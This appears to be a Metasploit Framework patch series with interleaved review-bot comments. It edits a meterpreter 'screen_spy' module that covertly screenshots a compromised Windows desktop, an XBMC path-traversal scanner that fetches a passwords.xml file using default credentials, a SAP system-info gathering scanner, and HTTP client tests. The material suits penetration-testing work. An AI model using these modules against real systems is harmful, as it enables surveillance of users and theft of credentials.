From: Luke Imhoff Date: Fri, 18 Jan 2013 11:12:16 -0600 Subject: [PATCH 005/139] Better Rubymine compatibility for .simplecov Rubymine's code coverage tools separate collection from reporting so that multiple runs can have their data merged. To separate, collecting from reporting, SimpleCov.start is only run when not using Rubymine (as indicated by a lack of the RM_INFO environment variable). This way, `rake spec` will collect coverage info and generate the report as before, but Rubymine will only collect coverage when using 'Run ... with coverage enabled' button and will only generate a report when using 'Generate Coverage Report' as is the intended behavior in Rubymine. --- .simplecov | 8 ++++++++ spec/spec_helper.rb | 6 ------ 2 files changed, 8 insertions(+), 6 deletions(-) diff --git a/.simplecov b/.simplecov index d3b12fe6bb..e8c1b367cf 100644 --- a/.simplecov +++ b/.simplecov @@ -1,3 +1,11 @@ +# RM_INFO is set when using Rubymine. In Rubymine, starting SimpleCov is +# controlled by running with coverage, so don't explicitly start coverage (and +# therefore generate a report) when in Rubymine. This _will_ generate a report +# whenever `rake spec` is run. +unless ENV['RM_INFO'] + SimpleCov.start +end + SimpleCov.configure do # ignore this file add_filter '.simplecov' diff --git a/spec/spec_helper.rb b/spec/spec_helper.rb index cf27db43d6..23c7b0778f 100644 --- a/spec/spec_helper.rb +++ b/spec/spec_helper.rb 
@@ -11,12 +11,6 @@ $LOAD_PATH.unshift(lib_pathname.to_s) # must be first require and started before any other requires so that it can measure coverage of all following required # code. It is after the rubygems and bundler only because Bundler.setup supplies the LOAD_PATH to simplecov. require 'simplecov' -# Ensure the coverage directory is always the same no matter where the individual spec is in the hierarchy when using -# Rubymine to run one spec. -# -# @see https://github.com/colszowka/simplecov/issues/95 -SimpleCov.root(root_pathname) -SimpleCov.start require 'rspec/core' From 80a0f0694d99c6ac348619394f9af242e8266b0e Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Wed, 30 Jan 2013 00:49:48 -0600 Subject: [PATCH 006/139] add 'auto' & 'none' VIEW_CMD, fixed looting, ch defaults --- modules/post/windows/gather/screen_spy.rb | 89 +++++++++++++++-------- 1 file changed, 59 insertions(+), 30 deletions(-) diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index 7b53d9391f..90a88eb02b 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb 
@@ -13,34 +13,40 @@ class Metasploit3 < Msf::Post super( update_info(info, 'Name' => 'Windows Gather Screen Spy', 'Description' => %q{ - This module will incrementally take screenshots of the meterpreter host. This + This module will incrementally take desktop screenshots from the host. This allows for screen spying which can be useful to determine if there is an active user on a machine, or to record the screen for later data extraction. + NOTES: set VIEW_CMD to control how screenshots are opened/displayed, the file name + will be appended directly on to the end of the value of VIEW_CMD (use 'auto' to + have the module do it's best...default browser for Windows, firefox for *nix, and + preview app for macs). 'eog -s -f -w' is a handy VIEW_CMD for *nix. To suppress + opening of screenshots all together, set the VIEW_CMD option to 'none'. }, 'License' => MSF_LICENSE, 'Author' => [ 'Roni Bachar ', # original meterpreter script 'bannedit', # post module - 'kernelsmith ', # record support + 'kernelsmith ', # record/loot support,log x approach, nx 'Adrian Kubok' # better record file names ], - 'Platform' => ['win'], + 'Version' => '$Revision$', + 'Platform' => ['windows'], # @todo add support for posix meterpreter somehow? 
'SessionTypes' => ['meterpreter'] )) register_options( [ - OptInt.new('DELAY', [false, 'Interval between screenshots in seconds', 5]), - OptInt.new('COUNT', [false, 'Number of screenshots to collect', 60]), - OptString.new('BROWSER', [false, 'Browser to use for viewing screenshots', 'firefox']), - OptBool.new('RECORD', [false, 'Record all screenshots to disk',false]) + OptInt.new('DELAY', [true, 'Interval between screenshots in seconds', 5]), + OptInt.new('COUNT', [true, 'Number of screenshots to collect', 6]), + OptString.new('VIEW_CMD', [false, 'Command to use for viewing screenshots (auto, none also accepted)', 'auto']), + OptBool.new('RECORD', [true, 'Record all screenshots to disk by looting them',false]) ], self.class) end def run host = session.session_host - screenshot = Msf::Config.install_root + "/data/" + host + ".jpg" + screenshot = Msf::Config.get_config_root + "/logs/" + host + ".jpg" migrate_explorer if session.platform !~ /win32|win64/i 
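Review bot: The new NOTES paragraph in 'Description' has two wording slips, `do it's best` should read `do its best` and `all together` should be `altogether`. It also documents a 'none' value and a literal prefix for `VIEW_CMD` while the option is registered as not required (`false` in the `OptString.new('VIEW_CMD', ...)` line of the same hunk), so the description should either say the option must be set or the option should be made required to match the text. The `initialize` method continues outside the hunk.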
@@ -55,46 +61,69 @@ class Metasploit3 < Msf::Post return end - # here we check for the local platform and use default browsers - # linux is the one question mark firefox is not necessarily a - case ::Config::CONFIG['host'] # neat trick to get the local system platform - when /ming/ - cmd = "start #{datastore['BROWSER']} \"file://#{screenshot}\"" - when /linux/ - cmd = "#{datastore['BROWSER']} file://#{screenshot}" - when /apple/ - cmd = "open file://#{screenshot}" # this will use preview + # here we check for the local platform to determine what to do when 'auto' is selected + if datastore['VIEW_CMD'].downcase == 'auto' + case ::RbConfig::CONFIG['host_os'] + when /mac|darwin/ + cmd = "open file://#{screenshot}" # this will use preview usually + when /mswin|win|mingw/ + cmd = "start iexplore.exe \"file://#{screenshot}\"" + when /linux|cygwin/ + # This opens a new tab for each screenshot, but I don't see a better way + cmd = "firefox file://#{screenshot} &" + else # bsd/sun/solaris might be different, but for now... + cmd = "firefox file://#{screenshot} &" + end + elsif datastore['VIEW_CMD'].downcase == 'none' + cmd = nil + else + cmd = "#{datastore['VIEW_CMD']}#{screenshot}" end begin count = datastore['COUNT'] - print_status "Capturing %u screenshots with a delay of %u seconds" % [count, datastore['DELAY']] + print_status "Capturing #{count} screenshots with a delay of #{datastore['DELAY']} seconds" # calculate a sane number of leading zeros to use. 
log of x is ~ the number of digits - leading_zeros = Math::log(count,10).round + leading_zeros = Math::log10(count).round + file_locations = [] count.times do |num| select(nil, nil, nil, datastore['DELAY']) data = session.espia.espia_image_get_dev_screen if data if datastore['RECORD'] - # let's write it to disk using non-clobbering filename - shot = Msf::Config.install_root + "/data/" + host + ".screenshot.%0#{leading_zeros}d.jpg" % num - ss = ::File.new(shot, 'wb') - ss.write(data) - ss.close + # let's loot it using non-clobbering filename, even tho this is the source filename, not dest + fn = "screenshot.%0#{leading_zeros}d.jpg" % num + file_locations << store_loot("screenspy.screenshot", "application/octet-stream", session, data, fn, "Screenshot") + #shot = Msf::Config.install_root + "/data/" + host + ".screenshot.%0#{leading_zeros}d.jpg" % num end - fd = ::File.new(screenshot, 'wb') - fd.write(data) - fd.close + # also write to disk temporarily so we can display in browser. They may or may not have been RECORDed. + if cmd # do this if they have not suppressed VIEW_CMD display + fd = ::File.new(screenshot, 'wb') + fd.write(data) + fd.close + end end - system(cmd) + system(cmd) if cmd end rescue ::Exception => e - print_error("Error taking screenshot: #{e.class} #{e} #{e.backtrace}") + print_error("Error taking or storing screenshot: #{e.class} #{e} #{e.backtrace}") return end print_status("Screen Spying Complete") - ::File.delete(screenshot) + if file_locations and not file_locations.empty? 
+ print_status "run loot -t screenspy.screenshot to see file locations of your newly acquired loot" + end + if cmd + # wait 2 secs so the last file can get opened before deletion + select(nil, nil, nil, 2) + begin + ::File.delete(screenshot) + rescue Exception => e + print_error("Error deleting the temporary screenshot file: #{e.class} #{e} #{e.backtrace}") + print_error("This may be due to the file being in use if you are on a Windows platform") + end + end end def migrate_explorer From 6659459de57bc8eefee68a1d85be890cadaebc29 Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Wed, 30 Jan 2013 10:56:49 -0600 Subject: [PATCH 007/139] del Version ref and change platform windows -> win per sinner's comments, thanks sinner. --- modules/post/windows/gather/screen_spy.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index 90a88eb02b..3ca16f439b 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -30,8 +30,7 @@ class Metasploit3 < Msf::Post 'kernelsmith ', # record/loot support,log x approach, nx 'Adrian Kubok' # better record file names ], - 'Version' => '$Revision$', - 'Platform' => ['windows'], # @todo add support for posix meterpreter somehow? + 'Platform' => ['win'], # @todo add support for posix meterpreter somehow? 'SessionTypes' => ['meterpreter'] )) From 32a5a009d63af5fca1fe02d9b5d5c33a0e9734a4 Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Wed, 30 Jan 2013 11:28:47 -0600 Subject: [PATCH 008/139] change loot type to image/jpg thanks egypt --- modules/post/windows/gather/screen_spy.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index 3ca16f439b..653abe9d9e 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb 
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Post if datastore['RECORD'] # let's loot it using non-clobbering filename, even tho this is the source filename, not dest fn = "screenshot.%0#{leading_zeros}d.jpg" % num - file_locations << store_loot("screenspy.screenshot", "application/octet-stream", session, data, fn, "Screenshot") + file_locations << store_loot("screenspy.screenshot", "image/jpg", session, data, fn, "Screenshot") #shot = Msf::Config.install_root + "/data/" + host + ".screenshot.%0#{leading_zeros}d.jpg" % num end From f649cd53ad2cdca7bd3a438ba56cee63a67af298 Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Wed, 30 Jan 2013 11:31:10 -0600 Subject: [PATCH 009/139] removed commented out code (again) thanks egypt --- modules/post/windows/gather/screen_spy.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index 653abe9d9e..6d8a9f07cb 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -93,7 +93,6 @@ class Metasploit3 < Msf::Post # let's loot it using non-clobbering filename, even tho this is the source filename, not dest fn = "screenshot.%0#{leading_zeros}d.jpg" % num file_locations << store_loot("screenspy.screenshot", "image/jpg", session, data, fn, "Screenshot") - #shot = Msf::Config.install_root + "/data/" + host + ".screenshot.%0#{leading_zeros}d.jpg" % num end # also write to disk temporarily so we can display in browser. They may or may not have been RECORDed. From e1c037e523824583a2c411cceab500024667c8f1 Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Wed, 30 Jan 2013 12:06:57 -0600 Subject: [PATCH 010/139] Better error handling --- modules/post/windows/gather/screen_spy.rb | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index 6d8a9f07cb..126bb04892 100644 
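Review bot: `image/jpg` is not a registered media type; the JPEG type is `image/jpeg`, so the loot call should read `file_locations << store_loot("screenspy.screenshot", "image/jpeg", session, data, fn, "Screenshot")`. Anything that maps the stored content type to a viewer or file extension will otherwise treat the loot as an unknown type. The enclosing loop and the `run` method lie outside this hunk.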
--- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -87,7 +87,12 @@ class Metasploit3 < Msf::Post file_locations = [] count.times do |num| select(nil, nil, nil, datastore['DELAY']) - data = session.espia.espia_image_get_dev_screen + begin + data = session.espia.espia_image_get_dev_screen + rescue RequestError => e + print_error("Error taking the screenshot: #{e.class} #{e} #{e.backtrace}") + return false + end if data if datastore['RECORD'] # let's loot it using non-clobbering filename, even tho this is the source filename, not dest @@ -104,8 +109,8 @@ class Metasploit3 < Msf::Post end system(cmd) if cmd end - rescue ::Exception => e - print_error("Error taking or storing screenshot: #{e.class} #{e} #{e.backtrace}") + rescue IOError => e + print_error("Error storing screenshot: #{e.class} #{e} #{e.backtrace}") return end print_status("Screen Spying Complete") From 345c5f32cc3c566b3eb3342b3b874365c435ece6 Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Wed, 30 Jan 2013 15:40:02 -0600 Subject: [PATCH 011/139] keep it from migrating more than once into explorer.exe thanks for noticing egypt we should add a migrate_explorer to the post api --- modules/post/windows/gather/screen_spy.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index 126bb04892..7e03e2440e 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -137,9 +137,10 @@ class Metasploit3 < Msf::Post begin session.core.migrate(p['pid'].to_i) print_status("Migration successful") + return p['pid'] rescue print_status("Migration failed.") - return + return nil end end end From 2cdeca54225b092ee508bf9043b6fec2dcbb69d5 Mon Sep 17 00:00:00 2001 
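Review bot: The `return false` added after a failed `espia_image_get_dev_screen` call leaves the temporary `screenshot` file written on earlier iterations in place, because the deletion and the loot summary at the end of `run` are skipped; a `break` out of `count.times` would let the existing cleanup run. `RequestError` is referenced unqualified; it resolves only if the module's namespace provides it (presumably the meterpreter request error class), otherwise the rescue clause itself raises `NameError` — worth confirming. With the second hunk narrowing the outer rescue to `IOError`, failures raised by `store_loot` or `system` are no longer reported by the module at all, which may be intended but should be stated in a comment. The enclosing `run` method starts and ends outside both hunks.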
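Review bot: The new `return p['pid']` makes `migrate_explorer` stop after the first successful migration, but the failure branch still prints `Migration failed.` without the cause; `rescue => e` together with `print_status("Migration failed: #{e.class} #{e}")` keeps the same flow and tells the operator why. The only caller visible in an earlier hunk, `migrate_explorer if session.platform !~ /win32|win64/i`, discards the return value, so the pid-or-nil contract should be documented on the method itself, which starts outside this hunk.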
From: Matt Andreko Date: Tue, 5 Feb 2013 14:32:50 -0500 Subject: [PATCH 012/139] Added reference & depth Added reference to IOActive's release. Added a depth option to allow user to specify how many folders to traverse. --- modules/auxiliary/scanner/http/xbmc_traversal.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/xbmc_traversal.rb b/modules/auxiliary/scanner/http/xbmc_traversal.rb index 2828421109..2f43b36077 100644 --- a/modules/auxiliary/scanner/http/xbmc_traversal.rb +++ b/modules/auxiliary/scanner/http/xbmc_traversal.rb @@ -31,6 +31,7 @@ class Metasploit3 < Msf::Auxiliary [ ['URL', 'http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348'], ['URL', 'https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335'], + ['URL', 'http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf'], ], 'DisclosureDate' => "Nov 4 2012" )) @@ -39,6 +40,7 @@ class Metasploit3 < Msf::Auxiliary [ Opt::RPORT(8080), OptString.new('FILEPATH', [false, 'The name of the file to download', '/private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml']), + OptInt.new('DEPTH', [true, 'The max traversal depth', 9]), OptString.new('USER', [true, 'The username to use for the HTTP server', 'xbmc']), OptString.new('PASS', [true, 'The password to use for the HTTP server', 'xbmc']), ], self.class) @@ -54,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary end # Create request - traversal = "../../../../../../../../.." #The longest of all platforms tested was 9 deep + traversal = "../" * datastore['DEPTH'] #The longest of all platforms tested was 9 deep res = send_request_raw({ 'method' => 'GET', 'uri' => "/#{traversal}/#{datastore['FILEPATH']}", From 039fd2b8853fc0deae8ecc522db41b21a2f8e105 Mon Sep 17 00:00:00 2001 
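Review bot: `"../" * datastore['DEPTH']` is not guarded against a zero or negative `DEPTH`; `String#*` raises `ArgumentError` for a negative count and `0` produces a request for `//#{FILEPATH}`, so validate up front next to the existing `FILEPATH` check, e.g. `if datastore['DEPTH'].to_i < 1 then print_error("DEPTH must be a positive integer"); return; end`. The trailing comment `#The longest of all platforms tested was 9 deep` now describes the default rather than the code and belongs on the `OptInt.new('DEPTH', ...)` line in the second hunk. The enclosing `run_host` method continues outside the hunk.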
From: Tod Beardsley Date: Mon, 11 Feb 2013 15:54:40 -0600 Subject: [PATCH 013/139] Adds some light testing for Rex's HTTP client lib In light ofi PR #1476, it would be nice to have some basic, modern, maintained testing on Rex's HTTP Client proto library. My rspec fu is quite weak, of course, but this should cover the very basic cases. There are lots of pending holes, but hey, it's a start. --- lib/rex/proto/http/client.rb | 3 +- spec/lib/rex/proto/http/client.rb | 244 ++++++++++++++++++++++++++++++ 2 files changed, 246 insertions(+), 1 deletion(-) create mode 100644 spec/lib/rex/proto/http/client.rb diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 760268a7f7..6159514399 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -420,7 +420,8 @@ class Client !(self.username.nil?) && self.username != '' end - # + alias :has_creds? :have_creds? + # Params - # res = The 401 response we need to auth from # opts = the opts used to generate the request that created this response diff --git a/spec/lib/rex/proto/http/client.rb b/spec/lib/rex/proto/http/client.rb new file mode 100644 index 0000000000..7555614842 --- /dev/null +++ b/spec/lib/rex/proto/http/client.rb 
@@ -0,0 +1,244 @@ +require 'rex/proto/http/client' + +# Note: Some of these tests require a failed +# connection to 127.0.0.1:1. If you have some crazy local +# firewall that is dropping packets to this, your tests +# might be slow. I wonder how Travis-CI will react to this... + +# Set a standard excuse that indicates that the method +# under test needs to be first examined to figure out +# what's sane and what's not. +def excuse_lazy(test_method=nil) + ret = "need to determine pass/fail criteria" + test_method ? ret << " for #{test_method.inspect}" : ret +end + +# Complain about not having a "real" connection (can be mocked) +def excuse_needs_connection + "need to actually set up an HTTP server to test" +end + +# Complain about not having a real auth server (can be mocked) +def excuse_needs_auth + "need to set up an HTTP authentication challenger" +end + +describe Rex::Proto::Http::Client do + + ip = "1.2.3.4" + + cli = Rex::Proto::Http::Client.new(ip) + it "should respond to intialize" do + cli.should be + end + + it "should have a set of default instance variables" do + cli.instance_variable_get(:@hostname).should == ip + cli.instance_variable_get(:@port).should == 80 + cli.instance_variable_get(:@context).should == {} + cli.instance_variable_get(:@ssl).should be_false + cli.instance_variable_get(:@proxies).should be_nil + cli.instance_variable_get(:@username).should be_empty + cli.instance_variable_get(:@password).should be_empty + cli.config.should be_a_kind_of Hash + cli.config_types.should be_a_kind_of Hash + end + + it "should produce a raw HTTP request" do + cli.request_raw.should be_a_kind_of Rex::Proto::Http::Request + end + + it "should produce a CGI HTTP request" do + cli.request_cgi.should be_a_kind_of Rex::Proto::Http::Request + end + + it "should attempt to connect to a server" do + this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) + expect { this_cli.connect(1) }.to raise_error ::Rex::ConnectionRefused + end + + it "should be able to close a 
connection" do + cli.close.should be_nil + end + + it "should send a request and receive a response" do + # cli.send_recv + pending excuse_needs_connection + end + + it "should send a request and receive a response without auth handling" do + # cli._send_recv + pending excuse_needs_connection + end + + it "should send a request" do + # cli.send_request + pending excuse_needs_connection + end + + it "should test for credentials" do + cli.should_not have_creds + this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) + this_cli.should have_creds + end + + it "should send authentication" do + pending excuse_needs_connection + end + + it "should produce a basic authentication header" do + u = "user1" + p = "pass1" + b64 = ["#{u}:#{p}"].pack("m*").strip + cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" + end + + it "should perform digest authentication" do + # cli.digest_auth + pending excuse_needs_auth + end + + it "should perform negotiate authentication" do + # cli.negotiate_auth + pending excuse_needs_auth + end + + it "should get a response" do + # cli.read_response + pending excuse_needs_connection + end + + it "should end a connection with a stop" do + cli.stop.should be_nil + end + + it "should test if a connection is valid" do + cli.conn?.should be_false + end + + it "should tell if pipelining is enabled" do + cli.pipelining?.should be_false + this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) + this_cli.pipeline = true + this_cli.pipelining?.should be_true + end + + it "should return an encoded URI" do + pending excuse_lazy :set_encode_uri + end + + it "should return an encoded query string" do + pending excuse_lazy :set_encode_qa + end + + # These set_ methods all exercise the evasion opts, looks like + + it "should set and return the URI" do + pending excuse_lazy :set_uri + end + + it "should set and return the CGI" do + pending excuse_lazy :set_cgi + end + + it "should set and return the HTTP 
verb" do + pending excuse_lazy :set_method + end + + it "should set and return the version string" do + pending excuse_lazy :set_version + end + + it "should set and return the HTTP seperator and body string" do + pending excuse_lazy :set_body + end + + it "should set and return the path" do + pending excuse_lazy :set_path_info + end + + it "should set and return the whitespace between method and URI" do + pending excuse_lazy :set_method_uri_spacer + end + + it "should set and return the whitespace between the version and URI" do + pending excuse_lazy :set_uri_version_spacer + end + + it "should set and return padding before the URI" do + pending excuse_lazy :set_uri_prepend + end + + it "should set and return padding after the URI" do + cli.set_uri_append.should be_empty + end + + it "should set and return the host header" do + pending excuse_lazy :set_host_header + end + + it "should set and return the agent header" do + pending excuse_lazy :set_agent_header + end + + it "should set and return the cookie header" do + pending excuse_lazy :set_cookie_header + end + + + it "should set and return the content-type header" do + pending excuse_lazy :set_cookie_header + end + + it "should set and return the content-length header" do + pending excuse_lazy :set_content_len_header + end + + it "should set and return the basic authentication header" do + pending excuse_lazy :set_basic_auth_header + end + + it "should set and return any extra headers" do + pending excuse_lazy :set_extra_headers + end + + it "should set the chunked encoding header" do + pending excuse_lazy :set_chunked_header + end + + it "should set and return raw_headers" do + pending "#set_raw_headers() doesn't seem to actually do anything" + end + + it "should set and return a formatted header" do + pending :set_formatted_header + end + + it "should respond to its various accessors" do + cli.should respond_to :config + cli.should respond_to :config_types + cli.should respond_to :pipeline + cli.should 
respond_to :local_host + cli.should respond_to :local_port + cli.should respond_to :conn + cli.should respond_to :context + cli.should respond_to :proxies + cli.should respond_to :username + cli.should respond_to :password + cli.should respond_to :junk_pipeline + # These are supposed to be protected + cli.should respond_to :ssl + cli.should respond_to :ssl_version + cli.should respond_to :hostname + cli.should respond_to :port + end + + # Not super sure why these are protected... + it "should refuse access to its protected accessors" do + expect {cli.ssl}.to raise_error NoMethodError + expect {cli.ssl_version}.to raise_error NoMethodError + expect {cli.hostname}.to raise_error NoMethodError + expect {cli.port}.to raise_error NoMethodError + end + +end From ba7f5a72455cf28231a5a11bc4557bc274a09637 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 11 Feb 2013 21:04:57 -0600 Subject: [PATCH 014/139] Actually run this spec. --- spec/lib/rex/proto/http/{client.rb => client_spec.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename spec/lib/rex/proto/http/{client.rb => client_spec.rb} (100%) diff --git a/spec/lib/rex/proto/http/client.rb b/spec/lib/rex/proto/http/client_spec.rb similarity index 100% rename from spec/lib/rex/proto/http/client.rb rename to spec/lib/rex/proto/http/client_spec.rb From 5a0744934efc130e2f1b8da7a19d46448e166a04 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 11 Feb 2013 21:06:52 -0600 Subject: [PATCH 015/139] Let's not intro functionality as testing That's a bad habit to get into. --- lib/rex/proto/http/client.rb | 3 +-- spec/lib/rex/proto/http/client_spec.rb | 7 ++++--- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 6159514399..760268a7f7 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb 
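Review bot: `cli` is created once at `describe` scope and then mutated by examples such as `cli.close` and `cli.stop`, so the outcome depends on example order; `let(:cli) { Rex::Proto::Http::Client.new(ip) }` gives every example a fresh instance. The accessor example asserts `cli.should respond_to :ssl` (and `:ssl_version`, `:hostname`, `:port`) while the next example expects `NoMethodError` for the same calls; whether `respond_to?` reports protected methods depends on the Ruby version, so presumably these two examples cannot both pass on every interpreter. `"should respond to intialize"` is misspelled (`initialize`), and the content-type example reuses `excuse_lazy :set_cookie_header` where the content-type setter is evidently meant. The connection example relies on 127.0.0.1:1 refusing connections, which the file's own header comment already flags as environment-dependent.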
@@ -420,8 +420,7 @@ class Client !(self.username.nil?) && self.username != '' end - alias :has_creds? :have_creds? - + # # Params - # res = The 401 response we need to auth from # opts = the opts used to generate the request that created this response diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 7555614842..de8c68f186 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -77,9 +77,10 @@ describe Rex::Proto::Http::Client do end it "should test for credentials" do - cli.should_not have_creds - this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) - this_cli.should have_creds + # cli.should_not have_creds + # this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) + # this_cli.should have_creds + pending "Should actually respond to :has_creds" end it "should send authentication" do From 3a6cd6f395bb62b9c5d6f3a4b9da4e214de75b91 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Tue, 12 Feb 2013 14:42:59 +0100 Subject: [PATCH 016/139] Added module for requesting RFC_SYSTEM_INFO via ICF web interface --- .../scanner/sap/sap_icf_rfc_system_info.rb | 290 ++++++++++++++++++ 1 file changed, 290 insertions(+) create mode 100644 modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb diff --git a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb new file mode 100644 index 0000000000..dd47aaa5c7 --- /dev/null +++ b/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb 
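Review bot: The new `pending "Should actually respond to :has_creds"` names a method that does not exist; as the first hunk shows, the client's method is `have_creds?`, and it can be exercised now instead of pended: `cli.have_creds?.should be_false`, and for a client built with `"user1", "pass1"` as in the commented-out lines, `this_cli.have_creds?.should be_true`. Leaving the three commented lines beside a `pending` is dead code a later reader cannot tell whether to trust; either restore them against `have_creds?` or delete them.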
@@ -0,0 +1,290 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +## +# This module is based on, inspired by, or is a port of a plugin available in +# the Onapsis Bizploit Opensource ERP Penetration Testing framework - +# http://www.onapsis.com/research-free-solutions.php. +# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts +# in producing the Metasploit modules and was happy to share his knowledge and +# experience - a very cool guy. I'd also like to thank Chris John Riley, +# Ian de Villiers and Joris van de Vis who have Beta tested the modules and +# provided excellent feedback. Some people just seem to enjoy hacking SAP :) +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'SAP /sap/public/info RFC_SYSTEM_INFO Function Sensitive Information Gathering', + 'Description' => %q{ + This module uses the RFC_SYSTEM_INFO function within SAP Internet Communication + Framework (ICF) to obtain the operating system version, SAP version, IP address + and other information through /sap/public/info + + }, + 'Author' => + [ + # original sap_soap_rfc_system_info module + 'Agnivesh Sathasivam', + 'nmonkee', + # repurposed for /sap/public/info (non-RFC) + 'ChrisJohnRiley' + ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('PATH', [true, 'Path to SAP Application Server', '/']) + ], self.class) + end + + def run_host(ip) + + print_status("[SAP] #{ip}:#{rport} - Sending RFC_SYSTEM_INFO request to SAP Application Server") + uri = normalize_uri(datastore['PATH'] + '/sap/public/info') + begin + res = send_request_raw({ 'uri' => uri }, 20) + if res and 
res.code != 200 + print_error("[SAP] #{ip}:#{rport} - Server did not respond as expected") + return + end + rescue ::Rex::ConnectionError + print_error("[SAP] #{ip}:#{rport} - Unable to connect") + return + end + + print_status("[SAP] #{ip}:#{rport} - Response received") + + saptbl = Msf::Ui::Console::Table.new( + Msf::Ui::Console::Table::Style::Default, + 'Header' => "[SAP] ICF RFC_SYSTEM_INFO", + 'Prefix' => "\n", + 'Postfix' => "\n", + 'Indent' => 1, + 'Columns' =>[ + "Key", + "Value" + ]) + response = res.body + rfcproto = $1 if response =~ /(.*)<\/RFCPROTO>/i + rfcchartyp = $1 if response =~ /(.*)<\/RFCCHARTYP>/i + rfcinttyp = $1 if response =~ /(.*)<\/RFCINTTYP>/i + rfcflotyp = $1 if response =~ /(.*)<\/RFCFLOTYP>/i + rfcdest = $1 if response =~ /(.*)<\/RFCDEST>/i + rfchost = $1 if response =~ /(.*)<\/RFCHOST>/i + rfcsysid = $1 if response =~ /(.*)<\/RFCSYSID>/i + rfcdbhost = $1 if response =~ /(.*)<\/RFCDBHOST>/i + rfcdbsys = $1 if response =~ /(.*)<\/RFCDBSYS>/i + rfcsaprl = $1 if response =~ /(.*)<\/RFCSAPRL>/i + rfcmach = $1 if response =~ /(.*)<\/RFCMACH>/i + rfcopsys = $1 if response =~ /(.*)<\/RFCOPSYS>/i + rfctzone = $1 if response =~ /(.*)<\/RFCTZONE>/i + rfcdayst = $1 if response =~ /(.*)<\/RFCDAYST>/i + rfcipaddr = $1 if response =~ /(.*)<\/RFCIPADDR>/i + rfckernrl = $1 if response =~ /(.*)<\/RFCKERNRL>/i + rfcipv6addr = $1 if response =~ /(.*)<\/RFCIPV6ADDR>/i + + saptbl << [ "Release Status of SAP System", rfcsaprl ] + saptbl << [ "RFC Log Version", rfcproto ] + saptbl << [ "Kernel Release", rfckernrl ] + saptbl << [ "Operating System", rfcopsys ] + saptbl << [ "Database Host", rfcdbhost] + saptbl << [ "Central Database System", rfcdbsys ] + + if rfcinttyp == 'LIT' + saptbl << [ "Integer Format", "Little Endian" ] + else + saptbl << [ "Integer Format", "Big Endian" ] + end + saptbl << [ "Hostname", rfchost ] + + if rfcflotyp == 'IE3' + saptbl << [ "Float Type Format", "IEEE" ] + else + saptbl << [ "Float Type Format", "IBM/370" ] + end + + saptbl 
